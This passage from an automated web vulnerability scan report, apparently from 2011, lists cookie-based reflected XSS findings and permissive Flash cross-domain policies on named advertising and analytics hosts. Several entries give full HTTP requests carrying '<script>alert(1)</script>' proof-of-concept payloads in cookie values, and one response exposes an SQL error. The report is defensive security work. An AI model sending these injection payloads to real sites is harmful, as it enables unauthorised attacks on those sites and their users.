Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webStat_108645=da8aee5f04e7ebdfbf66e7f2c334e7d5de83d<script>alert(1)</script>25380d542c7; webStat_108645_mv=da8aee5f04e7ebdfbf66e7f2c334e7d5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:55 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.10
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645_last=6c0c2cc469f86170c8aa98036158dc8b; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645_lastvisit=12+May+2011+06%3A33%3A55; expires=Sun, 09-May-21 13:33:55 GMT; path=/; domain=.nextstat.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1718
Connection: close
Content-Type: image/png

.PNG
.
...IHDR...x.........|.k.....PLTE.............yIDAT..c`..0.`.o`..`."....e.,....
.0.0....p>7.o.P...0H....?@|..a ....H.0(..w...@...........p>#.....o@.....`>...@........oU-*..8-....IEND.B`.</td
...[SNIP]...
</b> Invalid SQL:
       insert into 108645visitor set
visitorID        = 'da8aee5f04e7ebdfbf66e7f2c334e7d5de83d<script>alert(1)</script>25380d542c7',
entryTimestamp    = '20110512063355',
exitTimestamp    = '20110512063355',
masterVisitorID = 'da8aee5f04e7ebdfbf66e7f2c334e7d5',
browserID
...[SNIP]...
2.153. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload d8e89<script>alert(1)</script>2569e9647a5 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&jsref=&rnd=1305206987383 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==d8e89<script>alert(1)</script>2569e9647a5; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 13:31:36 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==d8e89<script>alert(1)</script>2569e9647a5
userid:
</div>
...[SNIP]...
2.154. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2036f"><script>alert(1)</script>d28f2b3e28b was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb92036f"><script>alert(1)</script>d28f2b3e28b; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1890
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb92036f"><script>alert(1)</script>d28f2b3e28b&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
2.155. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d56ba"><script>alert(1)</script>6c1cec4228b was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9d56ba"><script>alert(1)</script>6c1cec4228b; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1890
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9d56ba"><script>alert(1)</script>6c1cec4228b&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
2.156. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm [jsc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://urbanlegends.about.com
Path:   /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

Issue detail

The value of the jsc cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31165(a)e43f635586d was submitted in the jsc cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm HTTP/1.1
Host: urbanlegends.about.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; zFD=B5310B50110B00101; jsc=1331165(a)e43f635586d

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:25 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=-3600
Expires: Thu, 12 May 2011 12:32:25 GMT
Content-Type: text/html
Content-Length: 27132

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta name="docset" content="6"><meta http-equiv="Set-Cookie" content="Mint=B5CDWP23
...[SNIP]...
='0'
zOr='B5CDWP2320kA0Y2d';zTbO=zRQO=1;zp0=zp1=zp2=zp3=zfs=0;zDc=1;
zSm=zSu=zhc=zpb=zgs=zdn='';zFS='B5C10B50110B00101';zFD='B5C1B5310B50220B00202'
zDO=zis=1;zpid=zi=zRf=ztp=zpo=0;zdx=20;zfx=100;zJs=1331165(a)e43f635586d;
zi=1;zz=';336280=2-1-1299;72890=2-1-1299;336155=2-1-12-1;93048=2-1-12-1;30050=2-1-12-1';zx='3-1-1399';zde=15;zdp=1440;zds=1440;zfp=0;zfs=66;zfd=100;zdd=20;zaX=new Array(11, new Array(100,504,8198,1,'
...[SNIP]...
3. Flash cross-domain policy  previous  next
There are 38 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

3.1. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
3.2. http://ad-emea.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Thu, 12 May 2011 13:27:56 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
3.3. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 13:28:00 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
3.4. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Thu, 12 May 2011 20:54:55 GMT
Date: Wed, 11 May 2011 20:54:55 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 59612

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
3.5. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 12 May 2011 13:28:15 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
3.6. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
3.7. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
3.8. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:30:29 GMT
Date: Thu, 12 May 2011 13:30:29 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
3.9. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 13:28:00 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

3.10. http://cdn.eyewonder.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "b2ae8e693141c91:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Age: 11611
Date: Thu, 12 May 2011 13:30:36 GMT
Last-Modified: Fri, 07 Nov 2008 23:34:43 GMT
Expires: Thu, 12 May 2011 15:17:05 GMT
Content-Length: 195
Connection: close

<?xml version="1.0"?>
<!-- http://cdn.eyewonder.com-->
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>
3.11. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Thu, 12 May 2011 13:27:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...
3.12. http://core.insightexpressai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 13:30:22 GMT
Content-Length: 139
Connection: close
Set-Cookie: DW=68c7671305207022; expires=Wed, 07-May-2031 13:30:22 GMT; path=/; domain=insightexpressai.com
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>
3.13. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 13:28:02 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

3.14. http://feeds.delicious.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 10 May 2011 23:41:14 GMT
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Age: 0
Server: YTS/1.19.4

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
3.15. http://gscounters.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2a7f"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web201
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 13:28:12 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...
3.16. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 13:28:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
3.17. http://mashable.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mashable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mashable.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 18 Mar 2009 21:45:51 GMT
ETag: "a01237-d8-4656b9b76c1c0"
Cache-Control: max-age=900, public, must-revalidate, proxy-revalidate
Content-Type: text/xml
Content-Length: 216
Vary: Accept-Encoding
X-Cacheable: Yes
Date: Thu, 12 May 2011 13:28:26 GMT
Connection: close
X-Served-By: 261656-web3
X-Cache-Hits: 0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-
...[SNIP]...
3.18. http://ping.crowdscience.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
